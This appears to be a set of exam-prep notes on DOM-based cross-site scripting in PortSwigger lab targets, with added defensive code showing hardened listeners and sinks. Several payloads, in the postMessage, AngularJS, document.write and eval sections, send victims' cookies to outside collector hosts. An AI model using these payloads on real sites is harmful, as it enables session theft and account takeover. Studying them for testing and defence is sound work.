bscp notes
DOM-based

  • Identify potential sources of user input:

    • Look for URL parameters, form inputs, or fragments (#fragment) that the page processes dynamically using JavaScript.

    • Use browser developer tools to inspect how JavaScript interacts with the DOM. Look for dangerous methods like innerHTML, document.write(), eval(), or similar.

  • Test for input reflection:

    • Modify input that is passed through URL parameters or fragments to see if it appears on the page without proper encoding or sanitization. For example:

      • https://example.com/page.html?param=<script>alert('XSS')</script>

      • https://example.com/page.html#<script>alert('XSS')</script>

  • Probe with harmless scripts:

    • Start by injecting simple, non-malicious scripts like <img src=x onerror=alert(1)> to check whether the browser executes your code. If the alert box appears, it’s a sign the input is not properly sanitized.

  • Explore execution context:

    • Investigate where your input lands in the DOM. The payload may be reflected in plain HTML, inside a script block, inside an attribute value, or in an event handler such as onmouseover; the characters you need to break out with depend on that context.

  • Craft final exploit:

    • If the injection point allows it, create a malicious payload that achieves your goal, such as stealing cookies, redirecting the user, or logging keystrokes.

    • Deliver the payload via a URL or other input method to trigger the exploit.

Common attack vectors:

  • URL parameters or fragment identifiers (#fragment).

  • Insecure client-side JavaScript that processes user-controlled data directly.

postMessage listener that assigns the message data to location (no origin check; the javascript:print()//http: variant is for a listener that only tests whether the string contains http:):

<iframe src="https://target.net/" onload="this.contentWindow.postMessage('javascript:document.location=`https://collaborator.com?c=`+document.cookie','*')">

<iframe src="https://0adb00b304aa512b809fe4f1006100fe.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">

postMessage listener that writes the message data into innerHTML:

<iframe src="https://target.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=fetch(`https://OASTIFY.COM?collector=`+btoa(document.cookie))>','*')">

<iframe src="https://target.net" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

postMessage listener that parses the message as JSON and follows url when type is load-channel:

<iframe src=https://TARGET.net/ onload='this.contentWindow.postMessage(JSON.stringify({
    "type": "load-channel",
    "url": "javascript:document.location='https://OASTIFY.COM?c='+document.cookie"
}), "*");'>
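The three listener shapes above (raw URL assigned to location, raw HTML into innerHTML, JSON with a type/url pair) can be exercised outside a browser. The following is an added example, not code from these notes or from the labs the payloads target: each vulnerable handler is a model of the pattern the payload relies on, written against a fake location and document (fakeLocation, fakeDoc) so it runs under Node; the substring check for http: is assumed to be the reason the javascript:print()//http: payload works, and the origin names (target.net, attacker.example) and the TRUSTED_ORIGINS allow-list are assumptions. safeUrlListener shows the two checks a listener needs: an origin allow-list and a parsed-scheme allow-list.

```javascript
// Added example: models of vulnerable web-message listeners and a hardened one.
// Stand-ins for browser globals so this runs under Node (assumption: the real
// listeners assign to window.location / an element's innerHTML).
const fakeLocation = { href: 'about:blank' };
const fakeDoc = { innerHTML: '' };

// Pattern 1: no origin check, and a substring test for "http:" / "https:" that a
// javascript: URL satisfies just by containing those characters (assumed check).
function vulnerableUrlListener(event) {
  const url = event.data;
  if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
    fakeLocation.href = url;            // navigates to a javascript: URL -> XSS
  }
  return fakeLocation.href;
}

// Pattern 2: message body written straight into an innerHTML sink.
function vulnerableHtmlListener(event) {
  fakeDoc.innerHTML = event.data;       // <img src=1 onerror=...> fires on insertion
  return fakeDoc.innerHTML;
}

// Pattern 3: JSON message; only "type" is checked, "url" is trusted as-is.
function vulnerableJsonListener(event) {
  const msg = JSON.parse(event.data);
  if (msg.type === 'load-channel') {
    fakeLocation.href = msg.url;
  }
  return fakeLocation.href;
}

// Hardened listener: allow-list the sender origin, then parse the URL and
// allow-list the scheme. Parsing defeats the "contains http:" trick because the
// protocol of "javascript:print()//http:" is "javascript:".
const TRUSTED_ORIGINS = new Set(['https://target.net']);   // assumption
function safeUrlListener(event) {
  if (!TRUSTED_ORIGINS.has(event.origin)) return false;
  const raw = typeof event.data === 'string' ? event.data : '';
  let parsed;
  try {
    parsed = new URL(raw, 'https://target.net/');           // relative URLs resolve same-origin
  } catch (e) {
    return false;
  }
  if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') return false;
  fakeLocation.href = parsed.href;
  return true;
}

// Payloads from the notes (attacker-controlled message bodies) and a demo run.
const JS_URL_PAYLOAD = 'javascript:print()//http:';
const HTML_PAYLOAD = '<img src=1 onerror=print()>';
const JSON_PAYLOAD = JSON.stringify({ type: 'load-channel', url: JS_URL_PAYLOAD });

function demo() {
  const attacker = { origin: 'https://attacker.example' };   // assumed attacker page
  return {
    pattern1: vulnerableUrlListener({ ...attacker, data: JS_URL_PAYLOAD }),
    pattern2: vulnerableHtmlListener({ ...attacker, data: HTML_PAYLOAD }),
    pattern3: vulnerableJsonListener({ ...attacker, data: JSON_PAYLOAD }),
    hardenedRejectsForeignOrigin: safeUrlListener({ ...attacker, data: JS_URL_PAYLOAD }),
    hardenedRejectsJsUrlFromTrustedOrigin: safeUrlListener({ origin: 'https://target.net', data: JS_URL_PAYLOAD }),
    hardenedAcceptsRelativePath: safeUrlListener({ origin: 'https://target.net', data: '/channel/1' }),
  };
}
console.log(demo());
```

The JSON pattern needs the same treatment as the raw-URL one: check event.origin before parsing, and run msg.url through the parse-and-allow-list step rather than assigning it directly.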

AngularJS ng-app (client-side template injection)

Inside an ng-app element, {{ }} expressions are evaluated against the Angular scope. Any function exposed on the scope (for example $on or $eval) gives access to Function through its .constructor property; remember the trailing () that actually invokes the newly constructed function.

// In the browser console: inspect the scope of an element inside ng-app to see which functions are reachable
angular.element(document.getElementById('id-inside-ng-app')).scope();


{{$on.constructor('document.location="https://OASTIFY.COM?c="+document.cookie')()}}

{{$eval.constructor('alert(1)')()}}

document.write sink (here the source is written inside a <select> built with document.write: close the option and select elements, then inject a script and comment out the rest):

"></select><script>document.location='https://OASTIFY.COM/?domxss='+document.cookie</script>//

eval sink on a reflected JSON response (the server escapes " as \", so sending \" produces \\" which ends the string; -fetch(...) then runs as an expression, } closes the object and // comments out the remainder):

\"-fetch('https://OASTIFY.COM?reflects='+document.cookie)}//
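Why the \" prefix works can be shown without the lab. The following is an added example, not code from these notes or from the lab the payload targets: the server side is modelled as a naive encoder that escapes only double quotes (the behaviour the payload relies on, assumed here), the client side as a direct eval of the response text, and hit() stands in for the fetch() callback. Both fixes are shown: serialising with JSON.stringify on the server, and replacing eval with JSON.parse on the client.

```javascript
// Added example: reflected JSON passed to eval(), and the \"-...}// breakout.
const state = { hits: 0 };
function hit() { state.hits += 1; }   // stands in for fetch('https://OASTIFY.COM?...')

// Server model (assumption): the search term is reflected into a hand-built JSON
// string and only double quotes are escaped, so a user-supplied backslash survives.
function buildSearchJsonNaive(term) {
  const escaped = term.replace(/"/g, '\\"');
  return '{"results":[],"searchTerm":"' + escaped + '"}';
}

// Server fix: a real JSON serializer escapes the backslash as well.
function buildSearchJsonSafe(term) {
  return JSON.stringify({ results: [], searchTerm: term });
}

// Vulnerable client: the response body is evaluated as JavaScript.
function clientEval(body) {
  let searchResultsObj;
  eval('searchResultsObj = ' + body);   // direct eval of attacker-influenced text
  return searchResultsObj;
}

// Client fix: parse as data, never as code. Returns null on malformed input.
function clientParse(body) {
  try { return JSON.parse(body); } catch (e) { return null; }
}

// The payload from the notes, with hit() in place of the fetch() call.
// Sent as \"-hit()}//  the naive encoder turns \" into \\" : the backslash is now
// escaped and the quote closes the string. -hit() then runs as an expression,
// } closes the object literal and // comments out the server's closing "} .
const PAYLOAD = '\\"-hit()}//';

function demo() {
  const naiveBody = buildSearchJsonNaive(PAYLOAD);
  const safeBody = buildSearchJsonSafe(PAYLOAD);
  const before = state.hits;
  const viaEval = clientEval(naiveBody);        // executes hit()
  const hitsAfterEval = state.hits - before;
  const viaSafeServer = clientEval(safeBody);   // term stays a plain string, nothing runs
  const hitsAfterSafeServer = state.hits - before - hitsAfterEval;
  return {
    naiveBody,                                   // {"results":[],"searchTerm":"\\"-hit()}//"}
    hitsAfterEval,                               // 1
    evalSearchTerm: viaEval.searchTerm,          // NaN: the string "\\" minus hit()'s undefined
    hitsAfterSafeServer,                         // 0
    safeServerSearchTerm: viaSafeServer.searchTerm,  // the payload, as data
    parseOfNaiveBody: clientParse(naiveBody),    // null: not valid JSON
  };
}
console.log(demo());
```

Either fix alone stops the execution; applying both is the usual recommendation, since the client-side change also protects against any other server endpoint that builds JSON by hand.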

cookie manipulation

The site stores the last visited URL in a cookie (lastViewedProduct) and writes it back into the home page. The iframe first loads the URL that carries the payload, which gets saved into the cookie, and then redirects to the home page, where the cookie value is written into the DOM:

<iframe src="https://target.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://target.web-security-academy.net';window.x=1;">


When the iframe loads for the first time, the browser temporarily opens the malicious URL, which is then saved as the value of the lastViewedProduct cookie. The onload event handler ensures that the victim is then immediately redirected to the home page, unaware that this manipulation ever took place. While the victim's browser has the poisoned cookie saved, loading the home page will cause the payload to execute.
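Both document.write cases on this page (the store selector built from a URL parameter, and the home-page link built from the lastViewedProduct cookie) reduce to the same defect: untrusted text concatenated into markup. The following is an added example, not code from these notes or from the labs; the page scripts are modelled from the payloads above (the exact markup the labs emit, the ORIGIN value and the cookie name handling are assumptions), against a fake document that collects what is written so it runs under Node. The hardened versions HTML-encode the value and, for the cookie case, refuse anything that does not parse as a same-origin http(s) URL.

```javascript
// Added example: document.write sinks fed by location.search and by a cookie.
function makeDoc() {
  const chunks = [];
  return { write: (s) => chunks.push(s), html: () => chunks.join('') };
}

// Minimal HTML encoder for text content and quoted attribute values.
function htmlEncode(s) {
  return String(s).replace(/&/g, '&amp;').replace(/</g, '&lt;')
    .replace(/>/g, '&gt;').replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

const STORES = ['London', 'Paris'];

// Case 1, vulnerable (assumed shape): storeId from location.search written into a <select>.
function renderStoreSelect(storeId) {
  const doc = makeDoc();
  doc.write('<select name="storeId">');
  if (storeId) doc.write('<option selected>' + storeId + '</option>');
  for (const s of STORES) if (s !== storeId) doc.write('<option>' + s + '</option>');
  doc.write('</select>');
  return doc.html();
}

// Case 1, hardened: same markup, value encoded before it reaches the sink.
function renderStoreSelectSafe(storeId) {
  const doc = makeDoc();
  doc.write('<select name="storeId">');
  if (storeId) doc.write('<option selected>' + htmlEncode(storeId) + '</option>');
  for (const s of STORES) if (s !== storeId) doc.write('<option>' + htmlEncode(s) + '</option>');
  doc.write('</select>');
  return doc.html();
}

function lastViewedFromCookie(cookieHeader) {
  const m = /(?:^|;\s*)lastViewedProduct=([^;]*)/.exec(cookieHeader);
  return m ? m[1] : null;
}

// Case 2, vulnerable (assumed shape): cookie value written into a single-quoted href,
// so a ' in the stored URL closes the attribute and > closes the tag.
function renderLastViewed(cookieHeader) {
  const doc = makeDoc();
  const last = lastViewedFromCookie(cookieHeader);
  if (last) doc.write("<a href='" + last + "'>Last viewed product</a>");
  return doc.html();
}

// Case 2, hardened: accept only a same-origin http(s) URL, then encode it.
const ORIGIN = 'https://target.net';   // assumption
function renderLastViewedSafe(cookieHeader) {
  const doc = makeDoc();
  const last = lastViewedFromCookie(cookieHeader);
  if (last) {
    let u = null;
    try { u = new URL(last); } catch (e) { u = null; }
    if (u && u.origin === ORIGIN && (u.protocol === 'https:' || u.protocol === 'http:')) {
      doc.write('<a href="' + htmlEncode(u.href) + '">Last viewed product</a>');
    }
  }
  return doc.html();
}

// Detection helper: did a real <script> element end up in the written markup?
function hasScriptTag(html) { return /<script[\s>]/i.test(html); }

// Payloads from the notes (constructed inputs).
const SELECT_PAYLOAD = '"></select><script>document.location=\'https://OASTIFY.COM/?domxss=\'+document.cookie</script>//';
const COOKIE_PAYLOAD = "lastViewedProduct=https://target.net/product?productId=1&'><script>print()</script>";

console.log({
  selectVulnerable: hasScriptTag(renderStoreSelect(SELECT_PAYLOAD)),        // true
  selectHardened: hasScriptTag(renderStoreSelectSafe(SELECT_PAYLOAD)),      // false
  cookieVulnerable: hasScriptTag(renderLastViewed(COOKIE_PAYLOAD)),         // true
  cookieHardened: hasScriptTag(renderLastViewedSafe(COOKIE_PAYLOAD)),       // false
});
```

In a real page the better fix is to drop document.write entirely and build the elements with createElement/textContent, which has no HTML context to break out of; the encoding shown here is the minimum that keeps the existing markup-building code safe.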
